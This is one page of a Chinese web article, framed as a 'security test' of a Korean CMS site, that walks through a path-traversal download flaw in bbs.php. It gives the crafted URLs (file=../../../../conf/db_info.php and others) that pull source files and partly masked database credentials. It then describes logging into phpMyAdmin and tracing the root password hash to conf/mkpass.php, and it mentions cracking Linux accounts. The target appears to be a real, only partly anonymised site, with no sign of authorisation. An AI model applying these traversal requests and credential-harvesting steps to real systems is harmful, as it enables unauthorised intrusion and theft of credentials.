WEB开发网
开发学院网络安全安全技术 对韩国某CMS的一次安全检测 阅读

对韩国某CMS的一次安全检测

 2008-11-18 13:32:37 来源:WEB开发网   
核心提示: 图14破解Linux系统帐号10.继续检测web程序漏洞继续通过下载漏洞获取其它文件,在浏览器中输入构造好的地址:http://www.bk.net/ez/bbs.php?table=sub1&action=down&where=dat&dtype=up&uid=133&file=../.

图14破解Linux系统帐号

10.继续检测web程序漏洞

继续通过下载漏洞获取其它文件,在浏览器中输入构造好的地址:

http://www.b****k.net/ez/bbs.php?table=sub1&action=down&where=dat&dtype=up&uid=133&file=../../../../ez/bbs.php来下载bbs.php文件,将bbs.php文件下载到本地后,通过查看源代码,得到连接数据库的文件为conf/db_info.php,于是构造数据库文件下载地址:

http://www.b****k.net/ez/bbs.php?table=sub1&action=down&where=dat&dtype=up&uid=133&file=../../../../conf/db_info.php下载数据库连接文件,得到连接数据库的用户名和密码:111111111111111111111

$DB[kind] = "mysql";
$DB[host] = "localhost";
$DB[name] = "b*******";
$DB[user] = "banseuk";
$DB[pass] = "se********";
?>

于是登录phpmyadmin(221.***.**.21/mysql)管理数据库,准备查找出网站后台的用户名和密码(有时并不一定能找到phpmyadmin的地址),使用用户名“b*******”以及对应密码“"se********"”进行登录,登录Phpmyadmin后发现,该网站管理员表kimsmall7_gadmin竟然是空的,如图15所示。

对韩国某<a target=CMS的一次安全检测" onload="return imgzoom(this,550);" onclick="javascript:window.open(this.src);" style="cursor:pointer;"/>

图15管理员表为空

或者说这个不是管理员表?于是先下载登录处理文件看看,构造login文件下载地址:

http://www.b****k.net/ez/bbs.php?table=sub1&action=down&where=dat&dtype=up&uid=133&file=../../../../lib/login.php,将其下载到本地,查看一下代码,原来只有ROOT这个用户可以登录,但ROOT用户的密码不在数据库中,而在conf/mkpass.php文件中,而且使用crypt函数加密,如图16所示。

上一页  5 6 7 8 9 10 

Tags:韩国 CMS 一次

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接